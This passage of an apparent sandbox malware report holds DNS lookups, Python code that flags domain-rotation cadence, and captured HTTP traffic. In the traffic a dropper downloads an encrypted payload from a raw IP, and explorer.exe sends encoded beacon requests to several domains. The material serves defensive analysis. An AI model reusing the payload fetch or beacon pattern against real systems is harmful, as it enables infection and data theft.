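Feb 25, 2021 15:35:38.006710052 CET192.168.2.58.8.8.80x64eStandard query (0)www.scriptureonhealing.comA (IP address)IN (0x0001)
Feb 25, 2021 15:35:39.022430897 CET192.168.2.58.8.8.80x64eStandard query (0)www.scriptureonhealing.comA (IP address)IN (0x0001)
Feb 25, 2021 15:35:44.136579037 CET192.168.2.58.8.8.80xeb17Standard query (0)www.karatetheokinawaway.comA (IP address)IN (0x0001)
Feb 25, 2021 15:35:49.397527933 CET192.168.2.58.8.8.80x5be2Standard query (0)www.qionglaizhan.comA (IP address)IN (0x0001)
Feb 25, 2021 15:36:11.851654053 CET192.168.2.58.8.8.80x1886Standard query (0)www.qionglaizhan.comA (IP address)IN (0x0001)
"""

# Sandbox VM and resolver, taken from the report's session table; they
# disambiguate the fused IP columns.
KNOWN_HOSTS = ("192.168.2.5", "8.8.8.8")

DnsQuery = namedtuple("DnsQuery", "ts src dst tid name rtype")

ROW_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+) CET"
    r"(?P<ips>[\d.]+)"            # source and destination IP, boundary lost
    r"0x(?P<tid>[0-9a-fA-F]+)"
    r"Standard query \(0\)"
    r"(?P<name>\S+?)"
    r"(?P<rtype>[A-Z]+) \([^)]*\)"
    r"IN \(0x0001\)$"
)


def parse_ts(text):
    """'Feb 25, 2021 15:34:59.387612104' -> float seconds. The 9-digit
    fraction exceeds strptime's %f, so it is added by hand; the zone does
    not matter because only differences are used."""
    base, frac = text.split(".")
    dt = datetime.strptime(base, "%b %d, %Y %H:%M:%S").replace(tzinfo=timezone.utc)
    return dt.timestamp() + int(frac) / 10 ** len(frac)


def split_fused_ips(fused, known=()):
    """Recover (src, dst) from two concatenated dotted quads. The split is
    not always unique ('8.8.8.8192.168.2.5' also reads '8.8.8.81' +
    '92.168.2.5'), so every valid split is enumerated and a known address
    pair decides; an unresolvable row is rejected rather than guessed."""
    candidates = []
    for i in range(1, len(fused)):
        left, right = fused[:i], fused[i:]
        try:
            ipaddress.IPv4Address(left)
            ipaddress.IPv4Address(right)
        except ValueError:
            continue
        candidates.append((left, right))
    if len(candidates) == 1:
        return candidates[0]
    hinted = [c for c in candidates if c[0] in known and c[1] in known]
    if len(hinted) == 1:
        return hinted[0]
    raise ValueError(f"ambiguous IP split {fused!r}: {candidates}")


def parse_queries(text, known_hosts=KNOWN_HOSTS):
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised row: {line!r}")
        src, dst = split_fused_ips(m["ips"], known_hosts)
        rows.append(DnsQuery(parse_ts(m["ts"]), src, dst, int(m["tid"], 16), m["name"], m["rtype"]))
    return rows


def rotation_profile(rows, min_domains=5, gap_band=(3.0, 10.0)):
    """Flag a host that walks through many unrelated names at a steady pace
    (min_domains and gap_band are illustrative thresholds, not tuned values)."""
    first_seen = {}
    for r in rows:
        first_seen.setdefault(r.name, r.ts)
    times = sorted(first_seen.values())
    gaps = [round(b - a, 3) for a, b in zip(times, times[1:])]
    median = statistics.median(gaps) if gaps else None
    # Same name with the same transaction ID is the stub resolver retrying an
    # unanswered query; the same name with a new ID is a fresh lookup.
    repeats = Counter((r.name, r.tid) for r in rows)
    retransmits = sorted({name for (name, _), n in repeats.items() if n > 1})
    flagged = bool(len(first_seen) >= min_domains and median is not None
                   and gap_band[0] <= median <= gap_band[1])
    return {"distinct": len(first_seen), "gaps_s": gaps, "median_gap_s": median,
            "retransmits": retransmits, "flagged": flagged}


if __name__ == "__main__":
    for key, value in rotation_profile(parse_queries(REPORT_DNS_QUERIES)).items():
        print(f"{key}: {value}")
```

On these rows the profile reports 10 distinct names with a median gap of about 5.3 s, one retransmitted query (the SERVFAIL for www.scriptureonhealing.com), and a second, independent lookup of www.qionglaizhan.com 22 s later under a new transaction ID. The cadence alone does not identify the family; it is a triage signal to pair with the Snort check-in alerts and the sandbox's process attribution.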

HTTP Request Dependency Graph

• 45.153.203.33
• www.buytgp.com
• www.delmarranch.com
• www.apkiinsurance.com
• www.bestcroissantinlondon.com
• www.thakehamwesthorsley.com
• www.guillemaudexcellenceauto.com
• www.karatetheokinawaway.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49716 | 45.153.203.33 | 80 | C:\Users\user\Desktop\dwg.exe

Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 15:34:16.437721014 CET | 1150 | OUT | GET /mb.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 45.153.203.33
Cache-Control: no-cache
Feb 25, 2021 15:34:16.496598005 CET | 1151 | IN | HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Thu, 25 Feb 2021 10:54:48 GMT
Accept-Ranges: bytes
ETag: "211feda264bd71:0"
Server: Microsoft-IIS/10.0
Date: Thu, 25 Feb 2021 14:34:16 GMT
Content-Length: 164928
                                                Data Raw: a8 24 4b 82 f9 88 f9 c6 7d 04 10 aa 72 07 c5 63 43 e5 18 2e 43 2d 60 f8 bf 3c b3 20 cf 0a ca 10 37 8a d7 cd 8f ca 5e 1b 5c 5c f4 e4 0a 6f bf 86 a0 07 3d 78 77 98 da 38 7e c0 76 7b 5c f4 9c ae cd 00 90 37 c0 a5 0d b0 c3 4f 21 11 da 2f 61 53 72 d8 5a 68 e7 ee 3c 65 9d 33 bf d9 40 d6 5c 0d 17 e1 36 4a 69 c8 4f 27 75 46 93 a5 8f ea 72 c8 de 7b b4 f8 d3 e4 85 2f cd 16 cb cd 53 70 4d db 67 4a 4f 82 d5 5a ab e3 a8 4d 5d 65 5a 45 3d 77 65 74 d5 dd a2 e7 bd 37 60 d6 03 d8 aa c9 c0 02 bd 14 f5 87 4a e1 0f f4 6b 38 73 85 78 ef 7e 99 64 b1 69 a9 c2 8a 8d 23 9e ea 9c bd ad cc 6b 38 30 a4 07 9c 2c 4e 67 94 39 0d 79 ed 24 3d 11 d4 b5 84 00 e5 05 22 da c7 39 50 08 20 6d 05 42 68 f5 35 04 fe eb 44 f8 17 35 81 2a 60 1d ad d4 3c 3b ea c8 0e 19 14 9b 48 d0 b4 a9 48 87 24 03 0d 2d 1c dd 8a 5f f9 17 15 f8 8b b1 6b 51 da c2 af bc 9d 7b 79 b6 c8 bf fc e1 5c d6 75 1d 15 8e 2c ff 01 e4 ab fe 75 7e 9c 3e a8 c3 20 64 b7 8d 05 27 f4 5a d0 fb 87 d4 d5 f0 f7 b9 57 d0 a8 10 e3 0e bd d4 6d c3 53 fd 46 04 1b 3c 22 f7 4b d1 eb df 40 73 97 0f b4 f9 6d 82 7e 36 8a e8 3a 22 79 3c 51 5c de bf fe 20 b1 fe 1d 90 27 56 9b a9 f8 65 ea fa 9f 7b 0e 4d e2 63 06 43 dc 8b fe 04 ce 32 9a 27 6d aa 3b 25 bc 71 a2 46 51 80 ce 03 07 9d bd 89 3c 4b 79 93 a5 7e 3f a0 ee e8 38 75 1d e2 00 e3 56 5d 4d 54 dd 38 f6 bf 98 b8 1f c8 61 38 21 84 a4 58 31 39 5a 48 a0 83 17 d0 8e ce dc c0 80 d1 8b ef f4 3a 72 74 59 65 f1 a0 52 7b d9 5e b7 58 5b 2f 62 11 b0 b6 c6 ad ea d7 19 ec 79 43 d5 b4 b4 7d 11 60 d9 c7 a0 e3 c7 11 fc 14 b0 f6 84 43 c4 2c cd 00 7f 95 e9 11 ed 15 0d 5a aa 9d 0e 67 de 8b b4 31 a1 28 91 5c e8 74 e2 90 ef 99 5b f0 41 85 be d0 8d c7 d0 16 3a 43 c0 f6 59 66 bb d0 46 f8 79 9f f0 bc 97 1c bc b8 b4 61 32 6e 6a b5 6b cb d4 42 36 a4 f8 fc e4 34 88 ff f1 ad 97 3a df ef 14 29 22 a7 e3 d8 55 11 e6 26 f4 c5 5f d5 db 7a c2 eb 67 00 0a ae d9 5d 47 e6 d7 3b 43 5b dc 1e 7b 84 73 f4 49 1f 52 71 b9 c2 93 12 39 7f ce d5 7c 0c 69 00 14 01 c9 7c 30 96 24 a0 d8 e1 34 36 9a 38 
94 e2 72 86 dd 74 16 e1 20 0e e9 f1 2d 93 46 9e ba 1f 6b 8b 9d 7f ea 84 c3 6d db 40 35 d8 18 c7 a0 d6 a9 f2 1f 5e 4a c0 89 c6 84 d2 88 a4 49 bb fa 1e 8e b4 ca 62 60 1d bb ee a3 3c 7b b8 ef 7a b6 80 99 d9 c4 48 b0 b2 a4 ff d0 9d ce 4b d4 84 1c 28 da 80 ba f2 11 0c 46 b8 d2 d2 43 cc 8a 2a 30 91 b9 c1 bf df c0 d1 2e 47 03 43 70 45 e2 72 e5 ef 6f 64 53 aa 35 86 64 e0 d5 e9 3b a5 0a bd f4 53 8b af 0b a6 dd 55 0e bb 2c 5d 00 ae c5 09 06 43 07 4f d0 03 63 69 05 d9 11 f6 76 2a d7 e3 a0 72 a7 c4 6f 23 7e a0 52 83 da 03 b3 2a dd d7 c7 2a f0 a5 b5 b6 79 eb fd d2 80 5a d5 65 28 a5 0d b0 c3 17 a2 f9 d3 a4 a9 d0 b2 e4 d1 68 e4 2f bf a5 b5 30 b7 26 a1 46 5c 0d 17 e1 36 4a 69 c8 4f 27 75 46 93 a5 8f ea 72 c8 de 7b b4 f8 d3 e4 85 2f cd 16 cb cd eb 70 4d db 69 55 f5 8c d5 ee a2 2e 89 f5 5c 29 97 64 69 1f 0c 07 f5 ad d0 88 da 45 01 bb 23 bb cb a7 ae 6d c9 34 97 e2 6a 93 7a 9a 4b 51 1d a5 3c a0 2d b9 09 de 0d cc ec 87 80 29 ba ea 9c bd ad cc 6b 38 f5 01 8d 8a ad 8a 83 d1 b8 c9 9d a8 a5 f9 f5 91 5b 36 4f a0 c8 e6 3e 82 d7 e2 72 65 ef c1 a6 2d 1b 87 7d bb 6b 80 1c 52 67 e8 49 08 9c 69 30 79 3b ea c8 0e 19 14 9b 48 80 f1 a9 48 cb 25 02 0d 8f df 2e b4 5f f9 17 15 f8 8b b1 6b b1 da c0 ae b7 9c 71 79 b6 ba bd fc e1 5c d6 75 1d 15 8e 2c 4f d1 e5 ab fe 65 7e 9c 3e 38 c1 20 64 b7 cd 05 27 e4 5a d0 fb 85 d4 d5 f5 f7 b8 57 d0 a8 10 e3 0b bd d5 6d c3 53 fd
                                                Data Ascii: $K}rcC.C-`< 7^\\o=xw8~v{\7O!/aSrZh<e3@\6JiO'uFr{/SpMgJOZM]eZE=wet7`Jk8sx~di#k80,Ng9y$="9P mBh5D5*`<;HH$-_kQ{y\u,u~> d'ZWmSF<"K@sm~6:"y<Q\ 'Ve{McC2'm;%qFQ<Ky~?8uV]MT8a8!X19ZH:rtYeR{^X[/byC}`C,Zg1(\t[A:CYfFya2njkB64:)"U&_zg]G;C[{sIRq9|i|0$468rt -Fkm@5^JIb`<{zHK(FC*0.GCpErodS5d;SU,]COciv*ro#~R**yZe(h/0&F\6JiO'uFr{/pMiU.\)diE#m4jzKQ<-)k8[6O>re-}kRgIi0y;HH%._kqy\u,Oe~>8 d'ZWmS


                                                Session ID: 1
                                                Source IP: 192.168.2.5
                                                Source Port: 49721
                                                Destination IP: 23.227.38.74
                                                Destination Port: 80
                                                Process: C:\Windows\explorer.exe

                                                Timestamp: Feb 25, 2021 15:34:59.519618988 CET
                                                kBytes transferred: 1741
                                                Direction: OUT
                                                Data: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=mfN0nzHASLUjgM40ULkNQnoCovlHM9uH9yFdN4Wj+dx/VksqViu7/Odvkv5yi/Rll5ca HTTP/1.1
                                                Host: www.buytgp.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Timestamp: Feb 25, 2021 15:34:59.716490030 CET
                                                kBytes transferred: 1742
                                                Direction: IN
                                                Data: HTTP/1.1 403 Forbidden
                                                Date: Thu, 25 Feb 2021 14:34:59 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                X-Sorting-Hat-PodId: 149
                                                X-Sorting-Hat-ShopId: 47348220054
                                                X-Dc: gcp-us-central1
                                                X-Request-ID: a7602c6c-8aa4-43ef-9205-55bf2ef16f75
                                                Set-Cookie: _shopify_fs=2021-02-25T14%3A34%3A59Z; Expires=Fri, 25-Feb-22 14:34:59 GMT; Domain=buytgp.com; Path=/; SameSite=Lax
                                                X-Download-Options: noopen
                                                X-Permitted-Cross-Domain-Policies: none
                                                X-Content-Type-Options: nosniff
                                                X-XSS-Protection: 1; mode=block
                                                CF-Cache-Status: DYNAMIC
                                                cf-request-id: 087b36605d0000248480afa000000001
                                                Server: cloudflare
                                                CF-RAY: 6272267a2fcd2484-FRA
                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                Data Raw: 35 61 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a
                                                Data Ascii: 5af<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:


                                                Session ID: 2
                                                Source IP: 192.168.2.5
                                                Source Port: 49727
                                                Destination IP: 34.102.136.180
                                                Destination Port: 80
                                                Process: C:\Windows\explorer.exe

                                                Timestamp: Feb 25, 2021 15:35:04.845968008 CET
                                                kBytes transferred: 5245
                                                Direction: OUT
                                                Data: GET /gzjz/?iB=oFIukkgM6y8fCONc3B59jjyts4roz7ytDuYjBu/uDkaJWnvjVls8NePE6jnmXGkyfPJd&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1
                                                Host: www.delmarranch.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Timestamp: Feb 25, 2021 15:35:04.985801935 CET
                                                kBytes transferred: 5246
                                                Direction: IN
                                                Data: HTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Feb 2021 14:35:04 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "60363547-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session ID: 3
                                                Source IP: 192.168.2.5
                                                Source Port: 49729
                                                Destination IP: 104.21.56.93
                                                Destination Port: 80
                                                Process: C:\Windows\explorer.exe

                                                Timestamp: Feb 25, 2021 15:35:15.562661886 CET
                                                kBytes transferred: 5751
                                                Direction: OUT
                                                Data: GET /gzjz/?iB=qjvGcpBS9gngfccxw5QFty+eEZUVlIKAvl6NE25MOMcyD1XOvUK5P6Mu22Y8HvedKP3a&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1
                                                Host: www.apkiinsurance.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Timestamp: Feb 25, 2021 15:35:15.637638092 CET
                                                kBytes transferred: 5752
                                                Direction: IN
                                                Data: HTTP/1.1 301 Moved Permanently
                                                Date: Thu, 25 Feb 2021 14:35:15 GMT
                                                Content-Type: text/html; charset=iso-8859-1
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Set-Cookie: __cfduid=ddde661592d9bcb9b6cf9e7d17c606d9f1614263715; expires=Sat, 27-Mar-21 14:35:15 GMT; path=/; domain=.apkiinsurance.com; HttpOnly; SameSite=Lax
                                                Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Location: https://www.apkiinsurance.com/gzjz/?iB=qjvGcpBS9gngfccxw5QFty+eEZUVlIKAvl6NE25MOMcyD1XOvUK5P6Mu22Y8HvedKP3a&oH2d=YT8xZdXh-8LPDX3
                                                CF-Cache-Status: DYNAMIC
                                                cf-request-id: 087b369f08000017828e35b000000001
                                                Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=7z%2FyFE9jg2zW17FvmVo2E2dzCU%2FxKMiRAsQO46Cn0b%2F73vsEuJFIiGWPfRZbSPOL9DwHUvxB0kJymlmxmA%2Bk5GIKVYecOYHIe4IULEKRB1pcpE6zM2k%3D"}]}
                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 627226de79281782-FRA
                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 70 6b 69 69 6e 73 75 72 61 6e 63 65 2e 63 6f 6d 2f 67 7a 6a 7a 2f 3f 69 42 3d 71 6a 76 47 63 70 42 53 39 67 6e 67 66 63 63 78 77 35 51 46 74 79 2b 65 45 5a 55 56 6c 49 4b 41 76 6c
                                                Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.apkiinsurance.com/gzjz/?iB=qjvGcpBS9gngfccxw5QFty+eEZUVlIKAvl


                                                Session ID: 4
                                                Source IP: 192.168.2.5
                                                Source Port: 49730
                                                Destination IP: 192.0.78.25
                                                Destination Port: 80
                                                Process: C:\Windows\explorer.exe

                                                Timestamp: Feb 25, 2021 15:35:20.764060974 CET
                                                kBytes transferred: 5753
                                                Direction: OUT
                                                Data: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=4eJRf0meEh2QJsIJtqwHLZ+h6O4A+owpHjBhWLLxb5QgRA1fgcKJhCeYJGmPUuXRH+xS HTTP/1.1
                                                Host: www.bestcroissantinlondon.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Timestamp: Feb 25, 2021 15:35:20.804835081 CET
                                                kBytes transferred: 5754
                                                Direction: IN
                                                Data: HTTP/1.1 301 Moved Permanently
                                                Server: nginx
                                                Date: Thu, 25 Feb 2021 14:35:20 GMT
                                                Content-Type: text/html
                                                Content-Length: 162
                                                Connection: close
                                                Location: https://www.bestcroissantinlondon.com/gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=4eJRf0meEh2QJsIJtqwHLZ+h6O4A+owpHjBhWLLxb5QgRA1fgcKJhCeYJGmPUuXRH+xS
                                                X-ac: 2.hhn _dca
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                Session ID: 5
                                                Source IP: 192.168.2.5
                                                Source Port: 49731
                                                Destination IP: 94.136.40.51
                                                Destination Port: 80
                                                Process: C:\Windows\explorer.exe

                                                Timestamp: Feb 25, 2021 15:35:25.975158930 CET
                                                kBytes transferred: 5755
                                                Direction: OUT
                                                Data: GET /gzjz/?iB=S32aJJ0sM1lMGA6PL+NxQgVajUvS6UEY5ruSj9tLVOKy1xB24owBALJS5TkIZYObRZJu&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1
                                                Host: www.thakehamwesthorsley.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Timestamp: Feb 25, 2021 15:35:26.032011032 CET
                                                kBytes transferred: 5756
                                                Direction: IN
                                                Data: HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Thu, 25 Feb 2021 14:35:24 GMT
                                                Content-Type: text/html
                                                Content-Length: 793
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 61 6e 74 20 79 6f 75 72 20 6f 77 6e 20 77 65 62 73 69 74 65 3f 20 7c 20 31 32 33 20 52 65 67 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 2d 75 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 65 74 20 6f 6e 6c 69 6e 65 20 77 69 74 68 20 57 65 62 73 69 74 65 20 42 75 69 6c 64 65 72 21 20 43 72 65 61 74 65 20 61 20 66 72 65 65 20 32 2d 70 61 67 65 20 77 65 62 73 69 74 65 20 74 6f 20 67 6f 20 77 69 74 68 20 79 6f 75 72 20 6e 65 77 20 64 6f 6d 61 69 6e 2e 20 53 74 61 72 74 20 6e 6f 77 20 66 6f 72 20 66 72 65 65 2c 20 6e 6f 20 63 72 65 64 69 74 20 63 61 72 64 20 72 65 71 75 69 72 65 64 21 22 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2f 73 74 79 6c 65 73 68 65 65 74 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 
65 73 3d 22 33 32 78 33 32 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 31 32 33 2d 72 65 67 2d 6e 65 77 2d 64 6f 6d 61 69 6e 2e 63 6f 2e 75 6b 2f 69 66 72 61 6d 65 2e 68 74 6d 6c 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
